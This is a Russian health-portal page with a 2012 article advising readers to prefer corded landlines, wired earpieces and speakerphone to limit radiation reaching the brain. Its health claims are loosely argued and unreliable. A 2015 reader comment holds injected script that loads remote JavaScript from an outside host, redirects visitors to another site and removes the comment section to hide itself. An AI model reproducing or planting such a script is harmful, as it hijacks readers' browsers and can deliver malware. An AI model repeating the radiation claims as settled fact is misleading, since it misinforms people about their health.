Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Телефон. Как выбрать самы...  >>  Телефон. Как выбрать самый безопасный?
 
Обратная связь
 

Телефон. Как выбрать самый безопасный?

Размер шрифта
06 февраля 2012 08:00
  • google_analytics: false
  • Нравится

Какие телефоны больше вредят нашему здоровью: стационарные, мобильные или радио-трубки? Какой наушник выбрать для мобильного телефона? И как безопаснее всего говорить по мобильному телефону?

 1

  1. Какой телефон самый безопасный?

Безопаснее всего использовать старый-добрый стационарный телефон с проводом. Даже когда в доме отключается свет, он будет продолжать работать. Но самое главное его достоинство в том, что от него не исходит электромагнитное излучение, как от радио-телефона. А это значит, что ваш мозг не облучается.

1

Облучения от радио-телефона, а уж тем более, от мобильного, гораздо сильнее. И вред такого излучения до сих пор не доказан. Предполагается, что существует связь между долгими разговорами по мобильнику и возникновением опухоли головного мозга.

  1. Какой телефон лучше, с наушником или без?

Чем дальше мы держим источник излучения (телефон) от головного мозга, тем меньше его влияние на головной мозг. Иными словами, телефон с наушником безопаснее, так находится далеко от головного мозга.

1

Однако сам наушник может изменять проведение звука и действовать на барабанную перепонку.

  1. Какой наушник безопаснее: проводной или беспроводной?

Проводной наушник гораздо более безопасный, так как позволяет держать телефон – источник электромагнитного излучения – далеко от мозга.

1

Беспроводной наушник, или Bluetooth, сам является источником электромагнитного излучения. Но главный вред такого устройства в том, что человек постоянно находится на связи, а источник связи совсем близко от головного мозга и постоянно получает сигналы.

  1. Как безопаснее всего говорить по мобильному телефону?

1

На «громкой связи». В таком режиме вы не подносите телефон к уху и даже можете отойти от телефона, а значит, ваш мозг не облучается.



Cюжеты по теме:
Телефон. Как выбрать безопасный

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:57

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.